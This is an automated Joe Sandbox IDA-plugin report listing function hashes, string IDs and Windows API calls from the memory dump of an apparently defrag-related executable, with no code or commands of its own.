                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: 8$n$n$x
                                                                                                                                                                                                                                                                                    • API String ID: 0-2129689772
                                                                                                                                                                                                                                                                                    • Opcode ID: 3fc8ab0f70becb41a8c13356cb3e750a753a9f6ad6fc52484c3dafb684aa1eae
                                                                                                                                                                                                                                                                                    • Instruction ID: 4153cc9e9f9399db15846b8c3dde14c84802a132ab10d275a38415ff115d4298
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fc8ab0f70becb41a8c13356cb3e750a753a9f6ad6fc52484c3dafb684aa1eae
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F81215B3C012155FF728CA24DD9AAEEBB79EB90304F0581BAE80D66284D77D5BC5CE41
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: ExitProcess$ExitProcess$G<2@
                                                                                                                                                                                                                                                                                    • API String ID: 0-4201739117
                                                                                                                                                                                                                                                                                    • Opcode ID: 83f19afc67abe82571e38ff3db12f413b68646b430f82cd6c36d46b79f7540ab
                                                                                                                                                                                                                                                                                    • Instruction ID: c23cf397cf820b6e4d04b4d7928b2605fb7b39ed8a8d5c6d7e07ee262c8ce929
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83f19afc67abe82571e38ff3db12f413b68646b430f82cd6c36d46b79f7540ab
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FBD16CB1D052699BDB24CB14CD94BEAB7B1FF88300F1481EAE909A7341DA386EC1CF55
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?,?,?,00462FCF,?), ref: 00463797
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: DiskFreeSpace
                                                                                                                                                                                                                                                                                    • String ID: C:\
                                                                                                                                                                                                                                                                                    • API String ID: 1705453755-3404278061
                                                                                                                                                                                                                                                                                    • Opcode ID: caa803cb6983296de5ee153f39e565eadd17667fad978c7f1401b26cac8d0a89
                                                                                                                                                                                                                                                                                    • Instruction ID: 3d361454ac5cdfa27015c84eaa1fed5b08bb663ce5d8b65a2c27fb38a1a831b9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: caa803cb6983296de5ee153f39e565eadd17667fad978c7f1401b26cac8d0a89
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4811C5B69087019FC354DF69D98599BB7E4BF9C700F008A2EF4AE83250E731A548CF96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,00000003), ref: 0046300E
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0046301E
                                                                                                                                                                                                                                                                                      • Part of subcall function 004631F0: FindFirstFileW.KERNEL32(?,00000003,?), ref: 0046326C
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Find$FileFirst$Close
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2810966245-0
                                                                                                                                                                                                                                                                                    • Opcode ID: ac525a0fc5c95755cc08b111d521eb121ac2ef7f5b05646f188b6f13116b70e9
                                                                                                                                                                                                                                                                                    • Instruction ID: 9b1d8f8ee81afef67cdd5002a011b417e39822a31e6c33f357b0cfbac9d9b473
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac525a0fc5c95755cc08b111d521eb121ac2ef7f5b05646f188b6f13116b70e9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A38161711083819FC314DF14D988AABBBE8FFD9715F000A2EF59A83291DB749948CB67
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeviceIoControl.KERNEL32(?,00090064,00000000,00000000,?), ref: 00460093
                                                                                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004600C0
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ControlDeviceUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 9847766-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                    • Instruction ID: b288529985f008a1a54ef72dbef53761962e394cc992aae83e13a0fae47ca317
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41a6657a76e6a11c21828465e7547c488e33e83233d3adc9080a9250c0d0e56d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40F09CB5254B01AFD324CF55D841F53B7F9AB88B04F104A1DB68A87680D775F814CB55
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: G3H?$V
                                                                                                                                                                                                                                                                                    • API String ID: 0-4140640440
                                                                                                                                                                                                                                                                                    • Opcode ID: aee447dc61f4460ca895c100c7ce5877c7a3853d9c831398d218eb3c86bd2565
                                                                                                                                                                                                                                                                                    • Instruction ID: 49a599d4ef51342f46ea6850bb6920c02977a5b21b33fd7ed232df843d674447
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aee447dc61f4460ca895c100c7ce5877c7a3853d9c831398d218eb3c86bd2565
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0B1DEB1D041689AFB20CB14DC90AEFB7B5EB85311F2440FAD84DA6241E7385EC6DF96
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32 ref: 00474063
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00474074
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3859560861-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 41a9c3f869f20d536b5df22bbdb68c6f72c4f4a03b7167ff54cc11ecf120ab97
                                                                                                                                                                                                                                                                                    • Instruction ID: 0e5b393c9cfaccf242b34e640deb84f37198d475fe7bd5f1c49fe5a9f1fc366a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 41a9c3f869f20d536b5df22bbdb68c6f72c4f4a03b7167ff54cc11ecf120ab97
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDF05E716002405BD7209FA5D848FA3779C9F85350F04C12EE65D873A1DB79E881CB99
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: DiskDefrag\AutoDefragmention
                                                                                                                                                                                                                                                                                    • API String ID: 0-3564132280
                                                                                                                                                                                                                                                                                    • Opcode ID: dc3eb1a8291cfcc44befdd0b81a2d3cc0d6bc2a24e272f937c8f8eb1dffa6e4f
                                                                                                                                                                                                                                                                                    • Instruction ID: e958d21163334a27c47b0fc85bbaacef7bda82fad0e0f943e856080444f81741
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc3eb1a8291cfcc44befdd0b81a2d3cc0d6bc2a24e272f937c8f8eb1dffa6e4f
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9691AEB1D045689AEB208B16CC847FAB775FF84310F1081FAD44DA7684EB785EC2CB5A
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: ZS
                                                                                                                                                                                                                                                                                    • API String ID: 0-2462379649
                                                                                                                                                                                                                                                                                    • Opcode ID: c9fca04b9b31143a71d11b10c0a7b839e3dd0717628822feacdf38de00b63aa6
                                                                                                                                                                                                                                                                                    • Instruction ID: f21c68479b3c5eaebc1f5f3279f8d0faad101d72c6b89a0a1b7083a0ace80ae7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9fca04b9b31143a71d11b10c0a7b839e3dd0717628822feacdf38de00b63aa6
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C49104B2D055549BE728CB28CD89AEEBBB5EB89300F1481FFD40D67294D6785BC2CE41
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID: M2PN
                                                                                                                                                                                                                                                                                    • API String ID: 0-1141530561
                                                                                                                                                                                                                                                                                    • Opcode ID: bce53acc8339f026b01eb678d4e04c81f62b6b16d0eeaff7d47bfef90031c058
                                                                                                                                                                                                                                                                                    • Instruction ID: 8b48fcab1f62f79797c961b25b48a75d2e1cd7c856f0701d3c915d2211f122b7
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bce53acc8339f026b01eb678d4e04c81f62b6b16d0eeaff7d47bfef90031c058
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F5116F3D012145AF75CCA14ED9AAEBBB78EB81314F1181BFE40EA5580DA7C5BC18E42
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: cebec52c35d6d5a577127b37ee6518f550ca64958a00bab29b82289b9b11b50d
                                                                                                                                                                                                                                                                                    • Instruction ID: 6ff4827c734279f7e0de841156aecca73684415df30a65aab8c3daa831c00a85
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cebec52c35d6d5a577127b37ee6518f550ca64958a00bab29b82289b9b11b50d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20D1F8B2D082689AF7248A24DC44BEA7A75EB51310F0480FED44D57381DB7D5FC58FA6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: a57a128d1c16c12dcf4902804604208ecf22197fe885c780f8585ef138a26dff
                                                                                                                                                                                                                                                                                    • Instruction ID: 5f65285439b790b28c0d3b905ad07066762363c037cdec378342d8cce10f23cf
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a57a128d1c16c12dcf4902804604208ecf22197fe885c780f8585ef138a26dff
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 37B129316106099FD725CF28C48AB697FA0FF45364F298A58E89ACF2E1C375E991CB40
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 6156ee7c5859b3a1fcc43b2bfc7c0dd90522ffcbcea94545f825d9af007e4808
                                                                                                                                                                                                                                                                                    • Instruction ID: 6352d4130b6d38eda3f0917f26ea75489461ad1f8f451fda06db58098b015cac
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6156ee7c5859b3a1fcc43b2bfc7c0dd90522ffcbcea94545f825d9af007e4808
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5A10BB1E081588AF7248625DC48BEA7AB5EF51314F0480FED44C57382DA7D9FC98F66
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 411b77f1b17c79f053f6b327d9239c780f28367bd5560390947adfcd919ec4d5
                                                                                                                                                                                                                                                                                    • Instruction ID: a4e126031ac1d6303b47f947723bb3408289ab635862262de87fc69cd77de02e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 411b77f1b17c79f053f6b327d9239c780f28367bd5560390947adfcd919ec4d5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A491ECB2D002689FE7648B24DC85AEBBB74FB41314F1401FAD80DA7740E6789FC58E92
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 7d6ebca054e2f7689b85a4b771460ec9d32b8fbed782caf1c0a8fd484408adaf
                                                                                                                                                                                                                                                                                    • Instruction ID: 51035fdd40ba6af130e1cf43e43ed3c5e8d361631574942da8f568cd0f70edfa
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d6ebca054e2f7689b85a4b771460ec9d32b8fbed782caf1c0a8fd484408adaf
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F8118B3C012255BF728CA28CD9AAEABB79EB50304F0541BEE80D662C0D67D1FC5CE51
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: d448fed136f6b013e5f0e5fe5ac6345940a68bad63eab45d570404b4bc144211
                                                                                                                                                                                                                                                                                    • Instruction ID: 0f8d8f1531549f543e787c892f2a16359ab3b996e260e3aad9816a7d043ea16d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d448fed136f6b013e5f0e5fe5ac6345940a68bad63eab45d570404b4bc144211
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B761F1B2C002659FE728CA14DD89AEEBBB8EB58304F0581FAD80D57280D7796FC1CE51
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370480900.00000000004D6000.00000040.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 5832c10c76a503e9a85356905cf93c2ddb7a004c06b6a20f67111e80e155f7e7
                                                                                                                                                                                                                                                                                    • Instruction ID: 3665b7449f4d170db1c228802c273e752dcebb0474082da94558a54a5cde6ba4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5832c10c76a503e9a85356905cf93c2ddb7a004c06b6a20f67111e80e155f7e7
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2519EB1A002058FEB25CF69D9997AEBBF0FB48310F59843AC405EB2A0D3749D80CF50
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 70d014d65552d08ad7cd422562661d9099514aa5f296e359a8a4409b7059de46
                                                                                                                                                                                                                                                                                    • Instruction ID: fd6bbcd556357d9eeb051eeb42d7f6bccc5d62fccbdccfe49c3443563a2f1b6c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70d014d65552d08ad7cd422562661d9099514aa5f296e359a8a4409b7059de46
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9841B6B2D042155BEB28CB28DD56AFABB79EB94304F0481FFD40D66684D7385F818E41
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: d6eb95aebdd0832f893845c2801e487cae1a373ae23844e6cf616ad7b7813bce
                                                                                                                                                                                                                                                                                    • Instruction ID: 25f691dd9f4b04871031b08211d0b3aff43497b52775273811143d25c2d92c00
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6eb95aebdd0832f893845c2801e487cae1a373ae23844e6cf616ad7b7813bce
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211C933769A1007E76C843C58523AB418743E5738F298B2FA936C63E8E97DCD42515E
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetLogicalDrives.KERNEL32 ref: 0041DB47
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041DB30: GetDriveTypeW.KERNEL32(?,?,?,75BFAF60), ref: 0041DB8A
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001037,00000000,00000000), ref: 0040218F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000000), ref: 004021A2
                                                                                                                                                                                                                                                                                      • Part of subcall function 0041A9B0: SHGetFileInfoW.SHELL32(%SystemRoot%,00000040,000002B4,000002B4,00004011), ref: 0041A9DA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004021C3
                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(00000000,00000090), ref: 0040221B
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001208,00000000,?), ref: 0040227F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000001,00000000), ref: 00402370
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402590: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 004025C2
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000405,00000001,00000000), ref: 004023B9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00402660: SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00402692
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$BitmapDriveDrivesFileInfoLoadLogicalType
                                                                                                                                                                                                                                                                                    • String ID: 3402003$3402041$3402043$3402046$3402047$3402048$CPUIdleTime$CPUUsageExceed$DefragmentedFiles$DiskDefrag\AutoDefragmention$LastDefragmention$tG
                                                                                                                                                                                                                                                                                    • API String ID: 3599163918-2734650818
                                                                                                                                                                                                                                                                                    • Opcode ID: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                    • Instruction ID: bcfd938aa366970316b1685172ea95c37501a647d75b412e58de97171c7dff61
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b657ecd60b9bac2b9040caf1b0c8941b02365fce508479a01bd82f39a587853
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4A1D9B17503006BD710FF618D86FAE36A89F44714F10892EF60E7B2D2DABCA844875E
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(00000000), ref: 0042872A
                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00428751
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008022,00000000), ref: 0042878F
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008027,00000000), ref: 004287BB
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008028,00000000), ref: 004287E7
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 004287F6
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008023,00000000), ref: 00428822
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008024,00000000), ref: 0042884E
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008025,00000000), ref: 0042887A
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000800,00000000,00000000), ref: 00428889
                                                                                                                                                                                                                                                                                    • AppendMenuW.USER32(?,00000000,00008026,00000000), ref: 004288B5
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000001A.00000002.2370181311.0000000000401000.00000020.00000001.01000000.00000014.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_400000_854113748.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Menu$Append$CreateCursorPopup
                                                                                                                                                                                                                                                                                    • String ID: 10021$3401032$3401033$3401086$3401099$3401127$3401128
                                                                                                                                                                                                                                                                                    • API String ID: 2468982102-1766060818
                                                                                                                                                                                                                                                                                    • Opcode ID: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                    • Instruction ID: 3f46f92896953761dbd981ebaed820fc3143a3776dcc1953a56c74fff761f47c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0f288ede21beddef441f7f8c0533aa301f031c1d0427cbd65ca3cc463743e8ce
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9319DF5BD030076D2A066A58D57F9A76A99F84F00F31C80BB74E769C1CAECB4045BAD
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetComboBoxInfo.USER32 ref: 00416520
                                                                                                                                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0041654D
                                                                                                                                                                                                                                                                                    • GetMapMode.GDI32(?,00000000), ref: 00416561
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041658E
                                                                                                                                                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 004165AA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 004165D5
                                                                                                                                                                                                                                                                                    • OpenThemeData.UXTHEME(?,COMBOBOX,?,00FFFFFF,00000000,00000000), ref: 00416607
                                                                                                                                                                                                                                                                                    • DrawThemeBackground.UXTHEME(00000000,?,00000005,00000003,?,00000000), ref: 00416652
